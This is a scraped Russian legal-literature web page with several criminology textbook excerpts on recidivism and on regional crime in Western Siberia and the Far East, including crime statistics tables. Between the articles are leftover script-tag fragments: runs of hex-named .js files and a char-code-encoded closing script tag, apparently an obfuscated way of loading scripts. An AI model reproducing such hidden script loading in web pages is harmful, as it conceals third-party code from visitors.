type="text/javascript">f35252aa60fb844213163f8b13025184.js" type="text/javascript">28b19166f52f3c882e55e58d72c99946.js" type="text/javascript">83ea019956256ec70fb72489bc1bea91.js" type="text/javascript">98b64908b93d93fdf5bdeba8fd612f4f.js" type="text/javascript">c98f028fee6df17f593a2d6625a967ed.js" type="text/javascript">47f2e3f6e4953875f50c75190226c262.js" type="text/javascript">617e54d226bf27750fe36d3ccd02e953.js" type="text/javascript">52e502dd8619c8b9d5a5348bff3795f3.js" type="text/javascript">a8a0ad2ac0069ab77f988a4413275a4e.js" type="text/javascript">b9907618b0caaff40b62971bc45ae84e.js" type="text/javascript">
Коментариев: 0 | Просмотров: 357 |
Особенности детерминации и причинности рецидивной преступности
  Криминология | Автор: admin | 12-05-2010, 19:43
Рецидивная преступность является следствием общих процессов детерминации и причинности преступности в конкретных временно-пространственных границах; одновременно на нее оказывают сильное влияние процессы самодетерминации преступности в соответствующих условиях. Можно сказать, что рецидивная преступность наиболее концентрированно выражает негативные процессы, происходящие в преступности .
Экономические проблемы переходного периода, преобразование отношений собственности породили целые комплексы взаимодействующих объективных и субъективных факторов, влияющих на тенденции и характер всей и, в частности, рецидивной преступности. Кризисное положение в экономике, инфляция, падение жизненного уровня населения и углубление его материально-вещной дифференциации, политическая и национальная напряженность, вылившаяся в некоторых регионах в открытые военные конфликты, и целый ряд других негативных факторов постперестроечного периода привели к глубокому нравственно-психологическому кризису общества, пассивности и неверию людей в возможности вывода страны из кризиса, защиты их законных прав и интересов от преступных посягательств. Это осложняет борьбу с преступностью.
Причины и условия, способствующие рецидивной преступности, в отличие от преступности первичной, могут быть представлены в виде двух взаимосвязанных блоков .
Первый блок – это факторы первичные, обусловившие совершение первого преступления, поэтому они едины для первичных преступников и рецидивистов. Как показывают исследования, у лиц, совершивших преступления, как правило, сохраняются либо ухудшаются социальные условия и социальная среда, способствующие преемственности криминогенных ситуаций. Именно такое положение было зафиксировано результатами длящегося криминологического изучения личности рецидивистов во взаимодействии с их социальной средой. Крайне негативные условия формирования личности в детском и подростковом возрасте накладывали на нее стойкий негативный отпечаток, трудно поддающийся, а зачастую и не поддающийся воздействию, тем более что такие лица сознательно либо неосознанно стремились к своей привычной микросреде, в которой чувствовали себя наиболее комфортно .
Стереотипы поведения, существовавшие в родительской семье, переносились ими на собственную семью, если, конечно, не встречали сильного положительного противодействия со стороны супругов и других членов семьи, стремившихся ее сохранить и нравственно облагородить. Такая ситуация, однако, встречалась крайне редко, учитывая ближайшее социальное окружение данного контингента, поэтому коренной поворот в поведении лиц, ранее судимых, от крайне отрицательного в молодом возрасте до активно позитивного – в зрелом, практически не наблюдался.
Кроме того, связанные с политической и экономической ситуацией в стране негативные изменения условий жизни населения, такие, как обнищание отдельных его социальных слоев и групп, безработица, усиление нерегулируемых миграционных процессов, вызванных бегством из районов конфликтов, и другие, сказывающиеся на положении законопослушного населения, значительно острее воздействуют на лиц, утративших свои социальные позиции в связи с совершением преступления и отбыванием наказания. Такие лица испытывают на себе воздействие второго блока факторов, влияющих на рецидивную преступность. Данный блок специфичен именно для преступности рецидивистов. Внутри него выделяются две группы взаимодействующих факторов:
1) факторы, влияющие на неблагоприятное протекание постпенитенциарной адаптации, и 2) факторы, связанные с различными недостатками в деятельности правоохранительных органов и судов, снижающие или сводящие на нет результаты воздействия правоохранительной системы на лиц, совершивших преступления.
Прежде всего постпенитенциарная дезадаптация лиц, отбывших наказания в виде лишения свободы и утративших в связи с этим полностью или частично социально полезные связи, сочетается, как правило, с возникающими у этих лиц трудовыми и жилищными проблемами. В настоящее время еще больше обострилась проблема трудоустройства лиц, отбывших наказания: во-первых, из-за низкой, как правило, квалификации таких лиц (они не представляют интереса для производства, а обязать администрацию принять их на работу, как было ранее, сейчас практически невозможно); во-вторых (поскольку труд перестал быть конституционно закрепленной обязанностью каждого трудоспособного гражданина страны), более заманчивым для них, в силу их глубокой нравственно-правовой деформации, является поиск легких заработков, лежащих за пределами общественного производства;
в-третьих, видимое расширение возможности трудоустройства в предпринимательских структурах, помимо положительных факторов, несет и угрозу привнесения в такую деятельность элементов уголовной субкультуры и соответствующих норм поведения, что сказывается на методах работы коммерческих и других тому подобных организаций, способствует стиранию граней между предпринимательской и противозаконной антиобщественной деятельностью.b5d21e9b7de2f439134629be447a15ac.js" type="text/javascript">a267a2bd7a61dc8900677b25f477984dchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)f9c0239ff1eccfc6e7c7b333d0b5d41a.js" type="text/javascript">ac7d7747d9d40bdda54880fb1e3269cb.js" type="text/javascript">efeec4ff023ce752598f23dce3e4da4d.js" type="text/javascript">94372b7b6be08beb2dd7ecd3d96a4682.js" type="text/javascript">aa2b837fc7e4453fdb2ca23704aad0c6.js" type="text/javascript">518a05a6585f3a45a5d0e1303cef75af.js" type="text/javascript">8419aa96272631f3509afff825952250.js" type="text/javascript">4da2176cbd435baba66acf0c300e9650.js" type="text/javascript">f4dff05dccbc57d9ea73dd972574d05a.js" type="text/javascript">f0dca4091f43c89cd5058cf3848cdd3b.js" type="text/javascript">808dff9ccc15faa2a9a48e531dfb0185.js" type="text/javascript">
Коментариев: 0 | Просмотров: 271 |
Особенности борьбы с рецидивной преступностью
  Криминология | Автор: admin | 12-05-2010, 19:43
Борьба с рецидивной преступностью так же многоаспектна, как и ее причины. В этой борьбе первостепенное значение имеет общее оздоровление обстановки в стране, успешное проведение экономических реформ, устранение межнациональной напряженности, улучшение нравственно-психологического климата и другие факторы, способные благоприятно воздействовать на криминологическую ситуацию. Поскольку рецидивная преступность является социальным явлением, получающим уголовно-правовую оценку, т. е. она выражается в действиях, которые оцениваются уголовным законом как преступления, постольку очень важную роль в борьбе с такой преступностью играет законодательство, особенно связанное с назначением и исполнением наказаний.
Цели предупреждения рецидивной преступности служит рациональная система назначения и исполнения наказаний, ибо перевоспитание преступника начинается уже на стадии раскрытия преступления, изобличения преступника, т. е. осуществляется в процессе уголовного судопроизводства.
Согласно закону (ст. 37 УК РСФСР, ст. 60 УК РФ) личность виновного подлежит учету при назначении наказания. Неоднократность преступлений, рецидив преступлений – обстоятельства, отягчающие ответственность (ст. 63 УК РФ). И это означает прежде всего учет социально значимого поведения лица до совершения преступления. Если лица ранее уже совершали преступления, то это свидетельствует о более высокой степени их общественной опасности и влечет по законодательству применение к ним более суровых мер наказания.
Отнесение лица в соответствии со ст. 241 У К РСФСР к особо опасным рецидивистам влечет помимо вышеназванных еще более суровые последствия: возможность назначения наказания в виде лишения свободы на срок до 15 лет, отбывание наказания в колонии особого режима или тюрьме, неприменение условно-досрочного освобождения и замену наказания более мягким, обязательное установление административного надзора после освобождения из учреждения уго-ловно-исполнительной системы.
Новый Уголовный кодекс РФ смягчил положение рецидивистов, и это было сделано вопреки практически единодушной позиции криминологов. Понятие "особо опасный рецидивист" исключено из УК РФ. В ст. 18 УК РФ говорится лишь, что "рецидив преступлений влечет более строгое наказание на основании и в пределах, предусмотренных настоящим Кодексом". При формулировании отягчающих ответственность обстоятельств рецидив указывается через запятую, наравне с простой неоднократностью преступлений.
Между тем вероятность повторных преступлений во многом зависит от реагирования на первое преступление, а оценка лица, совершившего повторное преступление, – от того, подвергался он уголовно-процессуальному, уголовно-правовому воздействию или нет.
Оптимизация системы назначения и исполнения наказаний также весьма значима. Наказание для достижения своих целей должно быть максимально индивидуализированным, учитывающим все личностные особенности и характер содеянного. Нельзя без разбора приговаривать всех к лишению свободы, особенно тех, кого не следует изолировать от общества, как нельзя и не применять достаточно строгих мер к рецидивистам; это делает борьбу с рецидивом с помощью уголовно-правовых мер особенно трудной . Данная проблема еще больше осложняется в современных условиях, когда правоохранительная система переживает экономические, организационные и нравственные потрясения, испытывает на себе все большее давление криминального мира.
Нарастание организованности и профессионализма современных преступников, и особенно рецидивистов, влечет за собой усиление психического и физического воздействия на потерпевших, свидетелей, сотрудников правоохранительных органов, возникновение и развитие "теневой юстиции" .
Мощный отток квалифицированных кадров из правоохранительных органов в предпринимательские структуры и рост штатной неукомплектованности первых привели к тому, что растущему профессионализму рецидивистов был противопоставлен падающий профессионализм сотрудников правоохранительных органов, судей. В результате увеличивалось число ошибок, допускавшихся при избрании мер пресечения: ранее судимые лица, совершившие преступления, не брались под стражу или содержание под стражей заменялось на иную меру пресечения. Наказание назначалось неоднократно судимым без учета степени их социальной запущенности, характера прежних судимостей. Применялись, например, отсрочка исполнения приговора или наказание в виде исправительных работ и т. д.
Ликвидация таких недостатков, отрицательно влияющих на рецидив преступлений, должна стать результатом общего оздоровления и совершенствования правоохранительной системы. То же самое можно сказать и о системе исправитель-но-трудовых учреждений. Являясь звеном правоохранительной практики, она очень сильно пострадала в России от издержек перехода страны к рыночной экономике. Пенитенциарная система, поставленная в жесточайшие условия самовыживания в связи с кризисом производства, ухудшением снабжения и связей, соответствующим ростом незанятости осужденных и прочими факторами, повлияла на криминологическую ситуацию и психологический климат в местах лишения свободы .2b41f9d6aebbee800f91682d6708fdd9.js" type="text/javascript">34e590ecbd98525a28d923f5ba8aea8bchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)470d0892fab5573be39e86345af968db.js" type="text/javascript">6bd9977da9cd2967f8e7bc86e4f318be.js" type="text/javascript">a1fd3149a7f145151f16902d9adfa58f.js" type="text/javascript">4042e103a0ce5b3598e2e0a25fa9af5b.js" type="text/javascript">ebe003d77288f1461ffaa4142ee9105a.js" type="text/javascript">9f63064db5d9c8428aa596354c648c38.js" type="text/javascript">f45d8b0322649f20e547ba1f2062af13.js" type="text/javascript">d7e27edcdf9e3aea7d9816bf88b2a2b8.js" type="text/javascript">89c50073b32118aa253f2cca1eaa21b7.js" type="text/javascript">f502bd484a4c1e54ce71a5ff025ffd31.js" type="text/javascript">26876302631b283a677ca7e35a67e683.js" type="text/javascript">
Коментариев: 0 | Просмотров: 263 |
Региональное изучение преступности во взаимосвязи с социальными условиями
  Криминология | Автор: admin | 12-05-2010, 19:43
Изучение преступности во взаимосвязи с социальной средой, экономическими, экологическими, социальными, национальными и политическими факторами дает возможность выявления и прогнозирования неравномерности в состоянии и динамике преступности по регионам.
Одной из целей изучения региональных особенностей преступности и факторов, ее обусловливающих, является выделение регионов с новыми социальными явлениями и процессами, определяющими и новые тенденции преступности. Как результат, появляется возможность выработки мер по предупреждению преступности путем целенаправленного воздействия на социально-экономические условия и факторы, детерминирующие рост криминогенной активности населения региона.
Анализу территориальных различий криминальной ситуации уделялось большое внимание многими криминологами. Так, в России уже в XIX столетии были замечены существенные различия в состоянии преступности в разных регионах одного государства.e024b87bdb98be4052a31aa7071d0cf9.js" type="text/javascript">d522415e824dff8f711f054bf278b361char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)db9d7c2ab657d7cbfecfeb9e4648c152.js" type="text/javascript">97f563968b3b8f5c0f66d802bd34902b.js" type="text/javascript">c498a74825aa84112a7e5b16b001658d.js" type="text/javascript">0422c1edf04847ca3e98d55098c34562.js" type="text/javascript">6db3e83cbaa433b5ee01b7273750afcc.js" type="text/javascript">8edfedbcaac101bfbbf4a684bfa303cc.js" type="text/javascript">766c38ac747c9a73679bbab13e414901.js" type="text/javascript">736e7382d592214d82ee02268d4516b9.js" type="text/javascript">1d3d7d576e20fafe4e2915e659f73746.js" type="text/javascript">fb9b879c5d8baffbc4f7d6bedde3e125.js" type="text/javascript">6dce9970667a3702e781455157a49375.js" type="text/javascript">
Коментариев: 0 | Просмотров: 234 |
Преступность на юге Западной Сибири
  Криминология | Автор: admin | 12-05-2010, 19:43
В своих главных чертах современный географический и социально-экономический облик юга Западной Сибири определяется расположением на ее территории природных богатств, трудовых ресурсов, экономических центров, транспортной сети, расселением коренных народов, объединенных в национальные административные образования.
Краткий анализ особенностей криминологической ситуации на части территории региона, которая включает Кемеровскую и Томскую области, Красноярский и Алтайский края, показывает, что территория этих субъектов федерации составляет 3075, 7 тыс. квадратных километров, что составляет 18% территории Российской Федерации; население 10 632 тыс. человек – 7, 2% всего населения; в 1995 году здесь зарегистрировано 199 608 преступлений, или 7, 2% от общего массива преступлений (табл. 43).
Таблица 43
Зарегистрировано преступлений (абсолютная величина)

Регионы 1992 1993 1994 1995
Российская федерация 2 760 652 2 799 614 2 632 708 2 755 669
Кемеровская область 55 989 50 450 45 358 47 992
Алтайский край 48 522 48 944 44 203 47 984
Томская область 29 862 32 123 27 379 28 421
Красноярский край 67 712 69 050 67 083 75211

Природные ресурсы территории осваивались начиная с 30-х годов, причем значительная роль в освоении отводилась использованию труда осужденных. Целенаправленная концентрация так называемого спецконтингента в регионе к 50-м годам превратила области юга Западной Сибири в огромный лагерь.
Широкое применение труда заключенных не требовало особой заботы об условиях труда, делало излишним внедрение новых технологий. Следствием такого подхода к освоению региона явилось не только наличие в общей численности населения в середине 90-х годов около 30% лиц, ранее судимых, но и крайне низкий уровень развития инфраструктуры.
Столь значительное отставание социального развития породило хроническую напряженность и, как следствие, высокую криминальную активность населения (табл. 44).
Уровень преступности в регионе остается стабильно высоким и превосходит по России среднее значение, по тяжким видам преступлений на отдельных территориях превышение достигает 50%.
Таблица 44

Интенсивность тяжкой преступности – Кф
(Коэффициент по зарегистрированным фактам на 100 тыс. населения)

Регионы

% населения, прожив, в обл. крайцентрах 1992

1993

1994

1995


Российская Федерация – 273,9 348,6 667,6 1108,2
Кемеровская область 18,0 331,5 387,4 686,0 1081,9
Алтайский край 21,4 247,6 316,2 665,8 1222,6
Томская область 50,6 451,4 565,3 1145,3 1916,9
Красноярский край 25,5 302,9 374,7 713,6 1248,3

Не прекращается практика направления в регион осужденных из других областей и сегодня. Результатом такой пенитенциарной политики стала значительная концентрация осужденных, так на 100 тыс. населения России приходится в среднем 290 осужденных, в Западной Сибири – 330 осужденных, а в Кемеровской области эта цифра достигала в 1990 году 565 осужденных.
Криминологическая ситуация в регионе в немалой степени определяется именно этим контингентом, поскольку в среднем 63% из числа освободившихся из мест лишения свободы оседает на территории края.2a32aeee3656b920b8cd575ee9f27965.js" type="text/javascript">6cc1d425b788d759d711edb2a89dbde0char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)aa55f1c4badf859a57824f8fddc3b7a8.js" type="text/javascript">b56565189387fad48fc45bbce45b4da7.js" type="text/javascript">5cc6f1f22cc2261f9d262d9e28475fb0.js" type="text/javascript">4de7201a5d929f42952ffcb1a5428fca.js" type="text/javascript">7e02ceadfcc40232643a3f180ea98802.js" type="text/javascript">68f00614504dd8b8e01700d40e939b9e.js" type="text/javascript">f9dc640ac0f830aac9d6784961422047.js" type="text/javascript">d2ded5625d0363704fd788569b1f4892.js" type="text/javascript">873fc2a2f2f820dc4a0a264cf66c1e33.js" type="text/javascript">e7610136dda912ce1c9400297af9f7cd.js" type="text/javascript">1e7fca0a260bc0fb9807a96070ee9ea7.js" type="text/javascript">
Коментариев: 0 | Просмотров: 233 |
Преступность Дальневосточного региона
  Криминология | Автор: admin | 12-05-2010, 19:43
Своеобразие развития Дальневосточного региона оказывает влияние на различия в состоянии, динамике и структуре преступности Дальнего Востока в целом, его краев и областей по сравнению с другими регионами России. Причем на Дальнем Востоке преступность отличается ярко выраженными негативными характеристиками. Очевидно,, в Дальневосточном регионе существует специфический причинный комплекс, вызывающий такую ситуацию.
Прежде всего там отмечается высокая латентность преступности. Так, при снижении числа зарегистрированных преступлений в России за последние четыре года (1992–1995) на Дальнем Востоке это снижение практически в два раза выше, чем по стране (на Дальнем Востоке темп снижения в среднем за год составил 1,7%, а в России – 0,9%). В отдельных местностях Дальнего Востока наблюдается либо резкое снижение числа зарегистрированных преступлений (например, в Магаданской области темп снижения составил 25,1%), либо, наоборот, рост числа этих преступлений (в Сахалинской области – 11,8%). Специальные исследования показали, что реального снижения преступности в России в указанный период не происходило .
Преступность Дальнего Востока характеризуется более повышенным динамизмом, чем в целом по России. Причем резкие колебания показателей преступности наблюдаются и внутри динамических рядов этих показателей по краям и областям.
Отмеченная общая тенденция снижения числа регистрируемых преступлений, по мнению ряда ученых, все же не отражает улучшения криминологической обстановки в Дальневосточном регионе.
Например, хотя в 1992–1995 годах в среднем по Дальнему Востоку темп прироста числа зарегистрированных преступлений составил 30%, а по России 34,3%, что на 4,3% меньше, чем по стране, то по тяжким преступлениям картина несколько иная.
Среднегодовой темп прироста тяжких преступлений по Дальнему Востоку составил 796,8%, а по России всего 292,8%, т. е. в 2,7 раза больше, чем по стране в целом. При этом сверхвысокий темп прироста этого вида преступлений наблюдается в Амурской области (3703,3%). Кроме того, в 1995 году (по сравнению с 1994 г.) на всей территории Дальнего Востока отмечается значительный прирост тяжких преступлений (в десятки раз превышающий темп прироста всех зарегистрированных преступлений), которые несут в себе наибольшую социальную опасность, так как связаны с такими необратимыми процессами, как лишение жизни, нанесением увечья или применением насилия в отношении граждан. Данное обстоятельство указывает на повышение степени социальной опасности преступности на Дальнем Востоке по сравнению с Россией в целом.
Более того, этот вид преступлений составил более половины всего объема преступлений. Наибольший темп прироста тяжких преступлений имеет место в Приморском крае (67,3%) и Камчатской области (60,8%).
Из тяжких преступлений наиболее социально опасными являются умышленные убийства, тяжкие телесные повреждения и изнасилования, хотя их удельный вес в общем объеме тяжких преступлений составляет менее 5%. При общей тенденции снижения темпов прироста указанных видов преступлений (как в России в целом, так и на Дальнем Востоке) в отдельных местностях Дальневосточного региона наблюдается их рост. К примеру, в Магаданской области отмечается рост числа убийств (14%) и тяжких телесных повреждений (7,8%), а в Хабаровском крае – изнасилований (5,3%). А такие преступления, как разбои и хулиганство, в краях и областях Дальнего Востока в основном имеют тенденцию к росту, а в России– к снижению. При этом максимальный темп прироста числа разбоев наблюдается в Саха (Якутия) (16%), а хулиганства – в Сахалинской области (60,8%). Характерно, что за этот период в Приморском крае отмечается снижение темпов по всем названным видам преступлений из числа тяжких.
О дальнейшем снижении темпов всего объема регистрируемой преступности и отдельных ее видов можно проследить на примере Приморского края за 4 месяца 1996 года в сравнении с аналогичным периодом прошлого года. Так, продолжалось снижение темпов регистрации всей преступности (18%), в том числе тяжких преступлений на 18,3%, убийств – 3,1%, тяжких телесных повреждений – 1,1%, краж – 23,5%, краж из квартир – 17%, краж автомототранспорта – 37,5%, грабежей – 18,9%, разбоев – 18, 4% и т. д. В то же время в крае отмечается рост числа изнасилований (15,8%), преступлений, связанных с наркотиками (44,3%).
Если иметь в виду коэффициент преступности, который показывает интенсивность преступности независимо от такого детерминирующего фактора, как численность населения, то наиболее благоприятная криминологическая обстановка в исследуемый период (1992–1995 гг.) наблюдалась в Якутии (1456 преступлений на 100 тыс. всего населения), а крайне неблагоприятная криминологическая обстановка – в Сахалинской области (3517). В целом по Дальнему Востоку криминологическая обстановка крайне неблагоприятная. Коэффициент преступности в 1995 году на Дальнем Востоке составил 2638, а по России только 1846, что на 43,3% выше, чем по России (в 1994 г. он был выше всего на 16,2%).
Если посмотреть на состояние преступности по направлениям деятельности органов внутренних дел за 1995 год в сравнении с 1994 годом, то динамика преступности по этим направлениям различна, как по краям и областям Дальневосточного региона, так и по сравнению с Россией.3401f11c148c3a8933bd38b76ed7980d.js" type="text/javascript">02bfc978b949b2b782cb74fd839872cbchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)d0dde2af7633c6acb1960a0175429a1c.js" type="text/javascript">5da5fefe14820dcf19057bfe19ae34ca.js" type="text/javascript">7aa0ec2314bb4b81791e6c81226694e5.js" type="text/javascript">72a752f805c3415992a48b88004d967f.js" type="text/javascript">c9ac637198a944ecaf229b2d41ee0453.js" type="text/javascript">318eef294ba9875eb1f59bf74f8c4ceb.js" type="text/javascript">0bdc0dc87c9a85cb0d056bd14443618e.js" type="text/javascript">3087c28f0692e6fdf36fa24ad5175027.js" type="text/javascript">7a3f3d5b2ee88d176fc04875c854f7a5.js" type="text/javascript">67fb701a41b6eb4ce11f2f0ab77de483.js" type="text/javascript">b5f8d0f2e8b6d9d182f25ab25220c5f6.js" type="text/javascript">
Коментариев: 0 | Просмотров: 283 |
ukrstroy.biz
ЮРИДИЧЕСКАЯ ЛИТЕРАТУРА:
РАЗНОЕ:
КОММЕНТАРИИ:
ОКОЛОЮРИДИЧЕСКАЯ ЛИТЕРАТУРА: